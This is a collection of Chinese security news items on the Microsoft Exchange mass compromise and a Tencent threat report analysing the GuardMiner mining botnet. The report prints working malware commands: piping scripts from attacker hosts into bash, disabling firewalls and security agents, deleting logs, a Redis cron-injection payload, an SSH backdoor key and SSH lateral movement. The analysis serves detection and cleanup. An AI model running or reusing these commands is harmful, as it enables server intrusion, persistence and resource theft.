由于更多的黑客组织涌入，试图在受影响的公司为其服务器打补丁之前趁虚而入，微软Exchange服务器被黑客攻击正成为一个更大的安全问题。微软3月3日披露，黑客组织 “Hafnium”的攻击目标是微软Exchange服务器的漏洞，促使微软发布补丁。 漏洞公布后不久，Hafnium加强了攻击力度，在几天内袭击了3万家美国机构和世界各地的其他机构，但现在其他机构也加入了战团。安全专家告诉《金融时报》，更多的黑客组织正在利用这个机会，利用同样的漏洞进行自己的攻击。包括犯罪集团在内的黑客们，都是在托管服务器的组织打上补丁和保护之前，利用软件漏洞介入的。 对许多人来说，现在先发制人地修补这个问题可能为时已晚。”每一个可能的受害者，如果在上周中到年底还没有打补丁，就已经被至少一个或几个行为者命中了，”安全组织CrowdStrike联合创始人Dmitri Alperovitch这样表示。 在美国之外，欧洲银行业管理局成为第一个确认受到攻击的主要公共机构。 膨胀的攻击规模将在一段时间内成为一个严重的问题，促使政府进行干预。网络安全和基础设施安全局（CISA）已经敦促 “所有部门的所有组织遵循指导，以解决国内和国际上广泛存在的漏洞”。 还有人建议使用微软的IOC检测工具来确定是否发生了脆弱系统的入侵。同时白宫国家安全委员会声称：”任何拥有脆弱服务器的组织都必须立即采取措施，确定是否已经成为目标。”           （消息来源：cnBeta；封面源自网络）

一、概述 腾讯安全威胁情报中心检测到GuardMiner挖矿木马团伙新的攻击活动，该团伙利用Elasticsearch远程代码执行漏洞（CVE-2015-1427）等9种漏洞武器针对云上主机发起攻击。根据检测数据推算，受害主机已过万台，该挖矿木马会卸载云主机安装的安全软件。腾讯安全专家建议企业安全运维人员积极修复服务器组件漏洞，避免使用弱口令，防止云主机被该团伙使用的漏洞武器攻陷。 GuardMiner最早出现于2019年，至今已活跃超过2年，该挖矿木马通过Go语言编写的二进制程序针对Windows平台和Linux平台进行攻击传播，通过crontab定时任务以及安装SSH公钥后门进行持久化控制，并且还会利用比特币的交易记录来动态更新C2地址。 分析发现，GuardMiner挖矿团伙最新的攻击活动利用了多达9种攻击传播手法： 1)    CCTV设备RCE漏洞； 2)    Redis未授权访问漏洞； 3)    Drupal框架CVE-2018-7600漏洞； 4)    Hadoop未授权访问漏洞； 5)    Spring RCE漏洞CVE-2018-1273； 6)    Thinkphp V5高危漏洞； 7)    WebLogic RCE漏洞CVE-2017-10271； 8)    SQL Server弱口令爆破； 9)    Elasticsearch RCE漏洞 CVE-2015-1427、CVE-2014-3120 GuardMiner挖矿团伙入侵云主机后的挖矿行为会对服务器性能产生严重负面影响，服务器的正常业务有中断或崩溃风险。挖矿团伙在失陷服务器留置后门，关闭linux防火墙、卸载云服务器安全软件等行为，会导致服务器安全性受损，增加被其他黑客组织攻击的风险。 排查和加固 由于GuardMiner掌握较强的自动化攻击和扩散感染能力，腾讯安全专家建议企业及时检查以下位置并进行清理，同时对服务器使用的相关组件进行版本检查和漏洞修复，对于Redis、SQL Server使用的弱密码尽快予以纠正。 文件和进程 /etc/phpguard /etc/phpupdate /etc/networkmanager Crontab任务： */30 * * * * sh /etc/newdat.sh */2 * * * * curl -fsSL hxxp://h.epelcdn.com/dd210131/pm.sh SSH公钥（/root/.ssh/authorized_keys）： AAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/oeXUWDNW1MrWiQNvKeSeSSdZ6NaYVqfSJgXUSgiQbktTo8Fhv43R9FWDvVhSrwPoFBz9SAfgO06jc0M2kGVNS9J2sLJdUB9u1KxY5IOzqG4QTgZ6LP2UUWLG7TGMpkbK7z6G8HAZx7u3l5+Vc82dKtI0zb/ohYSBb7pK/2QFeVa22L+4IDrEXmlv3mOvyH5DwCh3HcHjtDPrAhFqGVyFZBsRZbQVlrPfsxXH2bOLc1PMrK1oG8dyk8gY8m4iZfr9ZDGxs4gAqdWtBQNIN8cvz4SI+Jv9fvayMH7f+Kl2yXiHN5oD9BVTkdIWX root@u17 腾讯安全响应清单 腾讯安全全系列产品支持对GuardMiner挖矿木马攻击传播的各个环节进行检测拦截。 腾讯安全产品针对GuardMiner团伙漏洞攻击武器，可在各个环节进行检测防御，具体响应清单如下： 应用场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）威胁情报已加入，可赋能全网安全设备。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 网络空间风险云监测系统 （CCMS） 1）GuardMiner相关情报已加入。 腾讯安全云监测系统，面向行业用户的监管方和被监管方，结合漏洞扫描、涉敏内容检测、全网威胁情报发现能力等，为用户提供全面、及时的互联网风险监测评估服务，并可提供配套安全管家服务，可对相关风险提供有效的响应处理。 腾讯T-Sec 高级威胁追溯系统 1）GuardMiner相关情报已支持检索，可自动关联分析到该病毒家族最新变种，使用资产。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 （Cloud  Firewall，CFW） 基于网络流量进行威胁检测与主动拦截，阻断恶意攻击流量，阻断恶意通信流量： 1）GuardMiner相关联的IOCs已支持识别检测； 2）已支持检测以下漏洞利用攻击： Hadoop未授权访问漏洞 Drupal CVE-2018-7600漏洞 thinkphp TP5高危漏洞 WebLogic CVE-2017-10271漏洞 Elasticsearch CVE-2014-3120远程代码执行漏洞 有关云防火墙的更多信息，可参考：  https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 1）云镜已支持GuardMiner关联模块的检测告警，查杀清理。 2）已支持检测主机存在的以下相关漏洞： Redis未授权命令执行漏洞 Hadoop未授权访问漏洞 Drupal  CVE-2018-7600漏洞 thinkphp  TP5高危漏洞 WebLogic  CVE-2017-10271漏洞 Elasticsearch  CVE-2014-3120远程代码执行漏洞 腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 基于网络流量进行威胁检测，已支持： 1）GuardMinerr相关联的IOCs已支持识别检测； 2）已支持检测以下漏洞利用攻击： Redis未授权命令执行漏洞 Hadoop未授权访问漏洞 Drupal  CVE-2018-7600漏洞 Spring  CVE-2018-1273漏洞 thinkphp  TP5高危漏洞 WebLogic  CVE-2017-10271漏洞 Elasticsearch CVE-2014-3120远程代码执行漏洞Elasticsearch  CVE-2015-1427远程代码执行漏洞 关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta 腾讯T-Sec 零信任无边界 访问控制系统 （iOA） 1）已支持GuardMiner关联模块的检测告警，查杀清理。 零信任无边界访问控制系统（iOA）是腾讯结合自身丰富的网络安全管理实践经验与“零信任”理念，推出的网络边界访问管控整体解决方案。更多资料，可参考：https://s.tencent.com/product/ioa/index.html 二、样本分析 利用Elasticsearch漏洞入侵 Elasticsearch是用Java语言开发的，并作为Apache许可条款下的开放源码发布，是一种流行的企业级搜索引擎。Elasticsearch用于云计算中，能够达到实时搜索，稳定，可靠，快速，安装使用方便。 搜索引擎支持使用脚本代码（Groovy）作为表达式进行数据操作，并且加入了沙盒进机制对危险的代码进行拦截，由于沙盒限制的不严格，导致产生远程代码执行漏洞CVE-2015-1427。该漏洞的攻击代码已被公开：hxxps://github.com/t0kx/exploit-CVE-2015-1427/blob/master/exploit.sh 腾讯云防火墙检测到黑客利用CVE-2015-1427漏洞攻击云主机： 利用漏洞执行的恶意命令为： wget hxxp://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh -P /tmp/sssooo 我们对命令下载执行的脚本init.sh进行分析发现其属于挖矿僵尸网络GuardMiner。 环境准备 1. init.sh关闭selinux防火墙 setenforce 0 2>dev/null echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null 2. 清理缓存 sync && echo 3 >/proc/sys/vm/drop_caches 3. 获取crontab目录和SSH公钥认证文件 crondir='/var/spool/cron/'"$USER" cont=`cat ${crondir}` ssht=`cat /root/.ssh/authorized_keys` 4. 将下载程序curl、wget重命名为cdt、wdt bbdir="/usr/bin/curl" bbdira="/usr/bin/cdt" ccdir="/usr/bin/wget" ccdira="/usr/bin/wdt" mv /usr/bin/curl /usr/bin/url mv /usr/bin/url /usr/bin/cdt mv /usr/bin/cur /usr/bin/cdt mv /usr/bin/cdl /usr/bin/cdt mv /usr/bin/cd1 /usr/bin/cdt mv /usr/bin/wget /usr/bin/get mv /usr/bin/get /usr/bin/wdt mv /usr/bin/wge /usr/bin/wdt mv /usr/bin/wdl /usr/bin/wdt mv /usr/bin/wd1 /usr/bin/wdt 5. 设置Linux系统能打开的最大文件数量 ulimit -n 65535 6. 删除系统日志文件 rm -rf /var/log/syslog 7. 设置tmp目录无法被删除 chattr -iua /tmp/ chattr -iua /var/tmp/ 8. 关闭Linux防火墙，删除过滤规则 ufw disable iptables -F 9. 禁用看门狗程序 echo '0' >/proc/sys/kernel/nmi_watchdog echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf 10. 卸载阿里云骑士等云主机安全软件 if ps aux | grep -i '[a]liyun'; then $bbdir http://update.aegis.aliyun.com/download/uninstall.sh | bash $bbdir http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash $bbdira http://update.aegis.aliyun.com/download/uninstall.sh | bash $bbdira http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash pkill aliyun-service rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service rm -rf /usr/local/aegis* systemctl stop aliyun.service systemctl disable aliyun.service service bcm-agent stop yum remove bcm-agent -y apt-get remove bcm-agent -y elif ps aux | grep -i '[y]unjing'; then /usr/local/qcloud/stargate/admin/uninstall.sh /usr/local/qcloud/YunJing/uninst.sh /usr/local/qcloud/monitor/barad/admin/uninstall.sh Fi service apparmor stop systemctl disable apparmor service aliyun.service stop systemctl disable aliyun.service ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 % rm -rf /usr/local/aegis 11. 设置系统最大内存分页 echo 128 > /proc/sys/vm/nr_hugepages sysctl -w vm.nr_hugepages=128 12. 设置挖矿木马、Shell脚本、扫描程序、守护程序的下载URL miner_url="hxxp://176.123.7.127/id210131/phpupdate" miner_url_backup="hxxp://h.epelcdn.com/dd210131/phpupdate" sh_url="hxxp://176.123.7.127/id210131/newdat.sh" sh_url_backup="hxxp://h.epelcdn.com/dd210131/newdat.sh" config_url="hxxp://176.123.7.127/id210131/config.json" config_url_backup="hxxp://h.epelcdn.com/dd210131/config.json" scan_url="hxxp://176.123.7.127/id210131/networkmanager" scan_url_backup="hxxp://h.epelcdn.com/dd210131/networkmanager" watchdog_url="hxxp://176.123.7.127/id210131/phpguard" watchdog_url_backup="hxxp://h.epelcdn.com/dd210131/phpguard" 13. 从比特币的交易记录中动态获取C2地址 （使用的比特币钱包为：1Hf2CKoVDyPj7dNn3vgTeFMgDqVvbVNZQq） if [ -x "$(command -v curl)" ]; then aa="1Hf2CKoVDyPj7dNn3vgTeFMgDqVvbVNZQq" bb="https://api.blockcypher.com/v1/btc/main/addrs/$aa?limit=2" cc=`curl -v --stderr - $bb |grep value|awk '{print $2}' |sed 's/[[:punct:]]//g; s/[[:space:]]/\n/g'|awk '{printf("%x\n",$0)}'|awk '{print substr($0,3,2)}'|awk '{print strtonum("0x"$0)}'|awk 'NR==2'`"."`curl -v --stderr - $bb |grep value|awk '{print $2}' |sed 's/[[:punct:]]//g; s/[[:space:]]/\n/g'|awk '{printf("%x\n",$0)}'|awk '{print substr($0,1,2)}'|awk '{print strtonum("0x"$0)}'|awk 'NR==2'`"."`curl -v --stderr - $bb |grep value|awk '{print $2}' |sed 's/[[:punct:]]//g; s/[[:space:]]/\n/g'|awk '{printf("%x\n",$0)}'|awk '{print substr($0,3,2)}'|awk '{print strtonum("0x"$0)}'|awk 'NR==1'`"."`curl -v --stderr - $bb |grep value|awk '{print $2}' |sed 's/[[:punct:]]//g; s/[[:space:]]/\n/g'|awk '{printf("%x\n",$0)}'|awk '{print substr($0,1,2)}'|awk '{print strtonum("0x"$0)}'|awk 'NR==1'` fi 挖矿 1. init.sh首先通过端口、进程名、文件名、钱包、矿池匹配，清除竞品挖矿木马 2. 然后杀死tmp目录下的或者CPU占用超过40%的可疑程序。 3. 清理被用来挖矿的docker容器 docker ps | grep "pocosow" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "gakeaws" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "azulu" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "auto" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "xmr" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "mine" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "monero" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "slowhttp" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "bash.shell" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "entrypoint.sh" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "/var/sbin/bash" | awk '{print $1}' | xargs -I % docker kill % docker images -a | grep "pocosow" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "gakeaws" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "buster-slim" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "hello-" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "azulu" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "registry" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "xmr" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "auto" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "mine" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "monero" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "slowhttp" | awk '{print $3}' | xargs -I % docker rmi -f % 4. 最后使用内置的URL依次下载攻击者控制的挖矿程序phpupdate、守护程序phpguard、攻击程序networkmanager并启动。 phpupdate采用开源挖矿程序XMRig编译： 持久化 1. init.sh通过安装crontab任务持久化。 if [ ! -f "/usr/bin/crontab" ] then   unlock_cron   echo "*/30 * * * * sh /etc/newdat.sh >/dev/null 2>&1" >> ${crondir}   lock_cron else   unlock_cron   [[ $cont =~ "newdat.sh" ]] || (crontab -l ; echo "*/30 * * * * sh /etc/newdat.sh >/dev/null 2>&1") | crontab -   lock_cron fi 2. 通过写入SSH authorized_keys公钥（留置后门）持久化。 chmod 700 /root/.ssh/       echo >> /root/.ssh/authorized_keys       chmod 600 root/.ssh/authorized_keys       echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/oeXUWDNW1MrWiQNvKeSeSSdZ6NaYVqfSJgXUSgiQbktTo8Fhv43R9FWDvVhSrwPoFBz9SAfgO06jc0M2kGVNS9J2sLJdUB9u1KxY5IOzqG4QTgZ6LP2UUWLG7TGMpkbK7z6G8HAZx7u3l5+Vc82dKtI0zb/ohYSBb7pK/2QFeVa22L+4IDrEXmlv3mOvyH5DwCh3HcHjtDPrAhFqGVyFZBsRZbQVlrPfsxXH2bOLc1PMrK1oG8dyk8gY8m4iZfr9ZDGxs4gAqdWtBQNIN8cvz4SI+Jv9fvayMH7f+Kl2yXiHN5oD9BVTkdIWX root@u17" >> /root/.ssh/authorized_keys 3. 通过守护程序phpguard持久化 phpguard主要完成以下功能： 1） 将挖矿程序添加到Linux crontab定时任务（Windows sctasks计划任务）中并启动； 2） 通过枚举进程检查挖矿程序是否处于运行状态，如果没有则启动程序，如果挖矿程序文件不存在则重新下载和运行。 横向移动 1.init.sh通过查询本机/root/.ssh/known_hosts中的SSH登陆记录，进行免密登陆连接，然后执行远程脚本spre.sh： if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'curl -o- hxxp://h.epelcdn.com/dd210131/spre.sh | bash >/dev/null 2>&1 &' & done fi 2. 直接通过执行攻击脚本spre.sh: $bbdir -fsSL hxxp://h.epelcdn.com/dd210131/spre.sh | bash $bbdira -fsSL hxxp://h.epelcdn.com/dd210131/spre.sh | bash 3. 通过Redis空口令和弱口令入侵 1）首先利用Pnscan、masscan批量扫描6379端口扫描发现Redis服务器，然后尝试进行无密码登陆，或者利用以下弱口令进行爆破登陆： redis root oracle password p@aaw0rd abc123 abc123! 123456 admin 2）Redis入侵登陆成功后，利用Redis未授权访问漏洞，在系统中写入恶意crontab任务，在任务中下载和执行恶意脚本pm.sh进行感染。 echo 'config set dbfilename "backup.db"' > .dat echo 'save' >> .dat echo 'flushall' >> .dat echo 'set backup1 "\n\n\n*/2 * * * * curl -fsSL hxxp://h.epelcdn.com/dd210131/pm.sh | sh\n\n"' >> .dat echo 'set backup2 "\n\n\n*/3 * * * * wget -q -O- hxxp://h.epelcdn.com/dd210131/pm.sh | sh\n\n"' >> .dat echo 'set backup3 "\n\n\n*/4 * * * * cdt -fsSL hxxp://localhost/bd210131/pm.sh | sh\n\n"' >> .dat echo 'set backup4 "\n\n\n*/5 * * * * wdt -q -O- hxxp://localhost/bd210131/pm.sh | sh\n\n"' >> .dat echo 'set backup1 "\n\n\n*/6 * * * * cd1 -fsSL hxxp://h.epelcdn.com/dd210131/pm.sh | sh\n\n"' >> .dat echo 'set backup2 "\n\n\n*/7 * * * * wd1 -q -O- hxxp://h.epelcdn.com/dd210131/pm.sh | sh\n\n"' >> .dat echo 'set backup3 "\n\n\n*/8 * * * * cd1 -fsSL hxxp://localhost/bd210131/pm.sh | sh\n\n"' >> .dat echo 'set backup4 "\n\n\n*/9 * * * * wd1 -q -O- hxxp://localhost/bd210131/pm.sh | sh\n\n"' >> .dat echo 'config set dir "var/spool/cron/"' >> .dat echo 'config set dbfilename "root"' >> .dat echo 'save' >> .dat echo 'config set dir "var/spool/cron/crontabs"' >> .dat echo 'save' >> .dat 4. 通过下载的攻击程序networkmanager进行横向移动，利用9种服务器应用的漏洞进行远程攻击，将go语言编写的木马程序networkmanager还原函数名的到如下内容： 1) Redis未授权访问漏洞； __tmp_0324_scan_exp_Redis_exploit __tmp_0324_scan_exp_re_exploit_connect_redis __tmp_0324_scan_exp_re_exploit_rce __tmp_0324_scan_exp_re_exploit_redis_brute __tmp_0324_scan_exp_re_exploit_unaurority_rce 2) Drupal RCE漏洞CVE-2018-7600； __tmp_0324_scan_exp_Drupal_exploit __tmp_0324_scan_exp_dp_7600_rce __tmp_0324_scan_exp_dp_7600_ver8_rce __tmp_0324_scan_exp_dp_7600_ver8_rce_func1 __tmp_0324_scan_exp_dp_check_payload __tmp_0324_scan_exp_dp_check_payload_func1 __tmp_0324_scan_exp_dp_isdrupal __tmp_0324_scan_exp_dp_isdrupal_func1 3) Hadoop未授权访问漏洞； __tmp_0324_scan_exp_Hadoop_exploit __tmp_0324_scan_exp_hd_exploit_unaurority_rce __tmp_0324_scan_exp_hd_exploit_unaurority_rce_func1 __tmp_0324_scan_exp_hd_exploit_unaurority_rce_func2 4) Spring RCE漏洞CVE-2018-1273； __tmp_0324_scan_exp_Spring_exploit __tmp_0324_scan_exp_sp_cve20181273_exists __tmp_0324_scan_exp_sp_cve20181273_exists_func1 __tmp_0324_scan_exp_sp_cve20181273_exploit __tmp_0324_scan_exp_sp_cve20181273_exploit_func1 5) Thinkphp V5高危漏洞； __tmp_0324_scan_exp_Thinkphp_exploit __tmp_0324_scan_exp_tp5_23_rce_Exists __tmp_0324_scan_exp_tp5_23_rce_Exists_func1 __tmp_0324_scan_exp_tp5_rce_Exists __tmp_0324_scan_exp_tp5_rce_Exists_func1 __tmp_0324_scan_exp_tp_exploit_tp5_23_rce_exp __tmp_0324_scan_exp_tp_exploit_tp5_23_rce_exp_func1 __tmp_0324_scan_exp_tp_exploit_tp5_23rce __tmp_0324_scan_exp_tp_exploit_tp5rce __tmp_0324_scan_exp_tp_exploit_tp5rce_exp __tmp_0324_scan_exp_tp_exploit_tp5rce_exp_func1 __tmp_0324_scan_exp_tp_isThinkphp __tmp_0324_scan_exp_tp_isThinkphp_func1 6) WebLogic RCE漏洞CVE-2017-10271； __tmp_0324_scan_exp_Weblogic_exploit __tmp_0324_scan_exp_wl_cve201710271_rce __tmp_0324_scan_exp_wl_cve201710271_rce_func1 __tmp_0324_scan_exp_wl_cve201710271_t_rce __tmp_0324_scan_exp_wl_wls_urlistrue __tmp_0324_scan_exp_wl_wls_urlistrue_func1 7) SQLServer爆破登陆后利用xp_cmdshell、SP_OACreate执行Payload； __tmp_0324_scan_exp_Sqlserver_exploit __tmp_0324_scan_exp_ss_crack_login __tmp_0324_scan_exp_ss_execute_payload __tmp_0324_scan_exp_ss_execute_sql __tmp_0324_scan_exp_ss_exploit __tmp_0324_scan_exp_ss_exploit_sp_oacreate __tmp_0324_scan_exp_ss_exploit_xcmdshell 8) Elasticsearch远程代码执行漏洞 CVE-2015-1427、CVE-2014-3120； __tmp_0324_scan_exp_es_exploit_cve20143120_rce __tmp_0324_scan_exp_es_exploit_cve20143120_rce_func1 __tmp_0324_scan_exp_es_exploit_cve20143120_t_rce __tmp_0324_scan_exp_es_exploit_cve20151427_rce __tmp_0324_scan_exp_es_exploit_cve20151427_rce_func1 __tmp_0324_scan_exp_es_exploit_cve20151427_t_rce 9) CCTV设备RCE漏洞。 __tmp_0324_scan_exp_Cctv_exploit __tmp_0324_scan_exp_cc_is_shell_rce __tmp_0324_scan_exp_cc_is_shell_rce_func1 __tmp_0324_scan_exp_cc_shell_rce __tmp_0324_scan_exp_cc_shell_rce_func1 __tmp_0324_scan_exp_cc_shell_t_rce 三、威胁视角看攻击行为 ATT&CK阶段 行为 侦察 扫描IP端口，确认可攻击目标存在的Web服务：WebLogic, Elasticsearch等。 资源开发 注册C2服务器，利用比特币交易记录更新C2地址 初始访问 利用对外开放的WebLogic, Elasticsearch服务，植入恶意Payload执行恶意命令进而入侵系统 执行 首先植入恶意脚本执行恶意命令，随后下载挖矿、持久化和攻击模块 持久化 创建Crontab任务、写入SSH后门公钥，启动守护进程phpguard 横向移动 利用Redis未授权访问漏洞、SSH免密登陆、Wed应用漏洞等方法横向移动 防御规避 木马文件加壳保护，将文件命名为系统文件名并设置为系统属性 发现 通过~/.ssh/known_hosts和~/.ssh/id_rsa.pub发现入侵主机历史登录凭据，用于进一步横向移动 命令与控制 守护模块phpguard，存在动态更新C2地址，根据不同的系统下发不同的Payload、执行任意命令的功能 影响 门罗币矿机不间断的工作，会导致系统CPU负载过大，大量消耗主机CPU资源，严重影响主机正常服务运行，导致主机有系统崩溃风险。 该团伙相关的威胁数据已加入腾讯安全威胁情报，已赋能给腾讯全系列安全产品，用户可以通过订阅腾讯安全威胁情报产品，让全网安全设备同步具备相应的威胁检测、防御能力。 推荐政企用户在公有云中部署腾讯云防火墙、腾讯主机安全（云镜）等产品检测防御相关威胁。 腾讯云防火墙已支持拦截利用Elasticsearch漏洞发起的恶意攻击行为。 腾讯主机安全（云镜）可对病毒攻击过程中产生得木马落地文件进行自动检测，用户可后台一键隔离，删除。 私有云用户可通过腾讯高级威胁检测系统（御界）进行流量检测分析，及时发现黑客团伙的攻击活动。 腾讯高级威胁检测系统（御界）可检测到利用Elasticsearch远程代码执行漏洞CVE-2015-1427发起的恶意攻击行为。   IOCs MD5: Networkmanager 9960bac4ddc3e864a167e03037b9e65a Phpguard 35269826d788370c3be184261adde884 Phpupdate 149c79bf71a54ec41f6793819682f790 spre.sh 4da10654aeecef6c766c3352a07955de scan.sh 1b849002406d6370754c45c6b3a41e9a pm.sh 37298c13dba7a26ae068dd02225fb5b5 Domain h.epelcdn.com sh.epelcdn.com URL hxxp://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh hxxp://h.epelcdn.com/dd210131/spre.sh hxxp://h.epelcdn.com/dd210131/scan.sh hxxp://sh.epelcdn.com/dd09162/pm.sh hxxp://h.epelcdn.com/dd210131/pm.sh hxxp://176.123.7.127/id210131/phpupdate hxxp://h.epelcdn.com/dd210131/phpupdate hxxp://176.123.7.127/id210131/newdat.sh hxxp://h.epelcdn.com/dd210131/newdat.sh hxxp://176.123.7.127/id210131/config.json hxxp://h.epelcdn.com/dd210131/config.json hxxp://176.123.7.127/id210131/networkmanager hxxp://h.epelcdn.com/dd210131/networkmanager hxxp://176.123.7.127/id210131/phpguard hxxp://h.epelcdn.com/dd210131/phpguard   参考链接： https://www.freebuf.com/column/205114.html https://blogs.akamai.com/sitr/2021/02/bitcoins-blockchains-and-botnets.html https://unit42.paloaltonetworks.com/watchdog-cryptojacking/ https://s.tencent.com/research/report/1012.html    

上周五，网络安全记者布莱恩·克雷布斯（Brian Krebs）和安迪·格林伯格（Andy Greenberg）报道称，在一次前所未有的电子邮件服务器攻击中有多达 3 万个组织受到影响。不过在上周末评估的最新数据，全球有超过 6 万个微软 Exchange 服务器客户被黑客攻击，欧洲银行业管理局承认是受害者之一。 Krebs 目前已经梳理了大规模 Exchange 服务器入侵事件的基本时间表，表示微软早在今年 1 月就已意识到这些漏洞。而首个安全补丁是在将近 2 个月之后才发布的，同时官方还发布了一篇博客文章，但没有解释攻击的范围和规模。甚至于微软原本计划将该补丁放在补丁星期二活动日上推出，但鉴于漏洞影响太大，所以才提前 1 周放出。 MIT Technology Review 报道称，除了主要黑客团体 Hafnium 之外，至少有 5 个黑客团体正在利用 Exchange 服务器的漏洞。目前美国政府官员正在争分夺秒的部署措施，一位官员告诉Cyberscoop，这是“A Big F-ing Deal”。 白宫新闻秘书 Jen Psaki 称这是“一个活跃的威胁”，让人们更加关注国土安全部网络安全机构3月3日发出的紧急指令。白宫国家安全顾问杰克-沙利文也对此提出了警告，前网络安全和基础设施安全局局长克里斯托弗-克雷布斯和白宫国家安全委员会也提出了警告。 Chris Krebs 在推文中写道：“这事情大条了。如果你的组织运行一个暴露在互联网上的OWA服务器，假设在02/26-03/03之间被入侵。检查C:\\inetpub\wwwroot\aspnet_client/system_web中的8个字符aspx文件。如果你搜索到了，你就进入了事件响应模式。” 国家安全委员会在推文中写道：“ 如果服务器已经被入侵，打补丁和缓解措施并不是补救措施。任何拥有易受攻击服务器的组织必须立即采取措施，以确定它们是否已经成为目标”。         （消息来源：cnBeta；封面源自网络）  

本周五，一位知情人士表示，微软（Microsoft Corp.）电子邮件软件中的一个漏洞遭黑客攻击，超过2万个美国机构已被攻破。此次黑客攻击的范围已经超过了此前从太阳风公司（SolarWinds Corp）下载的所有受污染代码，该公司是去年12月曝光的另一场大规模黑客攻击的核心目标。   美国调查记录显示，最新的黑客攻击使得信用合作社、乡镇政府和小型企业均接入了远程接入渠道。 记录显示，来自亚洲和欧洲的数万个组织也受到了影响。 尽管微软本周二发布了紧急补丁，但黑客攻击仍在继续。 微软最初曾表示，此次黑客攻击是“有限的、有针对性的攻击”，周五却拒绝就问题的规模置评。不过微软公司也表示正与政府机构和安全公司合作，为客户提供帮助。 此外，微软公司补充说，“受到影响的客户应联系我们的支持团队，以获得额外的帮助和资源。” 对连接设备的一次扫描显示，截至本周五，只有10%的易受攻击的设备安装了补丁，不过这一数字还在上升。 由于安装补丁并不能彻底消除漏洞，美国官员正在努力研究如何通知所有受害者，并指导他们进行黑客追捕。 所有受影响的公司似乎都在自己的机器上运行了电子邮件客户端Outlook的Web版本，而不是依赖云提供商。记录显示，后者可能会使许多大公司和联邦政府机构幸免于难。 美国联邦网络安全与基础设施安全局（Federal Cybersecurity and Infrastructure Security Agency）没有回应置评请求。 本周五早些时候，白宫新闻秘书Jen Psaki对记者表示，目前在微软广泛使用的Exchange服务器上发现的漏洞是“重大的”，且“可能产生深远的影响”。 Psaki表示：“我们担心受害者的队伍过于庞大。” 微软和参与美国回应工作的人士将第一波黑客攻击归咎于一名有中国政府背景的演员。但一名中国政府发言人表示，中国不是此次黑客入侵事件的幕后黑手。 从去年年底开始的针对几个典型间谍目标的控制性攻击，已经在上个月发展成为了一场广泛的战役。安全官员表示，这意味着除非中国改变了策略，否则第二个组织可能已经参与其中。 随着用来控制邮件服务器代码的不断传播，预计未来还会有其他黑客发起更多的攻击。 政府工作人员表示，目前黑客们只是利用漏洞重新进入并在受感染的网络中移动，这只占很小比例，可能不到十分之一。 他说：“目前有几百人正在以最快的速度利用它们，窃取数据，并安装其他方法，以便稍后返回。” 最初的攻击途径是由中国台湾知名网络研究员Cheng-Da Tsai发现的。蔡表示，他在今年1月向微软报告了这一漏洞。他在一篇博客文章中说，他正在调查信息是否泄露。 他没有回应进一步置评的请求。           （消息来源：cnBeta；封面源自网络）

